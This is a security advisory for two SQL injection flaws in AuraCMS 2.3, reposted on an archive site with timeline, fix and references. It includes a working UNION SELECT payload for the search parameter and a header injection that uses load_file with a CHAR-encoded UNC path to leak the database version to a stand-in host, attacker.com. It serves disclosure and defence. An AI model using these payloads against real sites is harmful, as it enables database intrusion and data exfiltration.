exploit the possibilities

AuraCMS 2.3 SQL Injection

AuraCMS 2.3 SQL Injection
Posted Feb 6, 2014
Authored by High-Tech Bridge SA | Site htbridge.com

AuraCMS version 2.3 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
advisories | CVE-2014-1401
MD5 | c4071bd4895e54def2fc8c125e33e89d

AuraCMS 2.3 SQL Injection

Change Mirror Download
Advisory ID: HTB23196
Product: AuraCMS
Vendor: AuraCMS
Vulnerable Version(s): 2.3 and probably prior
Tested Version: 2.3
Advisory Publication: January 8, 2014 [without technical details]
Vendor Notification: January 8, 2014
Vendor Patch: January 30, 2014
Public Disclosure: February 5, 2014
Vulnerability Type: SQL Injection [CWE-89]
CVE Reference: CVE-2014-1401
Risk Level: Medium
CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in AuraCMS, which can be exploited to alter SQL queries and execute arbitrary SQL commands in application's database.


1) Multiple SQL Injection Vulnerabilities in AuraCMS: CVE-2014-1401

1.1 The vulnerability exists due to insufficient validation of "search" HTTP GET parameter passed to "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of MySQL server:

http://[host]/index.php?mod=content&action=search&search=1%27%29%2f**%2funion%2f**%2fselect%201,version%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15%20--%202


1.2 The vulnerability exists due to insufficient validation of "CLIENT_IP", "X_FORWARDED_FOR", "X_FORWARDED", "FORWARDED_FOR", "FORWARDED" HTTP headers in "/index.php" script. A remote authenticated attacker can execute arbitrary SQL commands in application's database.

The exploitation example below displays version of MySQL server:


GET / HTTP/1.1
CLIENT_IP: '),('',(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))) -- 2


-----------------------------------------------------------------------------------------------

Solution:

Fixed by vendor on January 30, 2014 directly in the source code without version modification/new release. Update to the version 2.3 released after January 30, 2014.

More Information:
https://github.com/auracms/AuraCMS/commit/4fe9d0d31a32df392f4d6ced8e5c25ed4af19ade

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23196 - https://www.htbridge.com/advisory/HTB23196 - Multiple SQL Injection Vulnerabilities in AuraCMS.
[2] AuraCMS - http://auracms.org - AuraCMS is an open source software that will let you manage content of your website.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    12 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close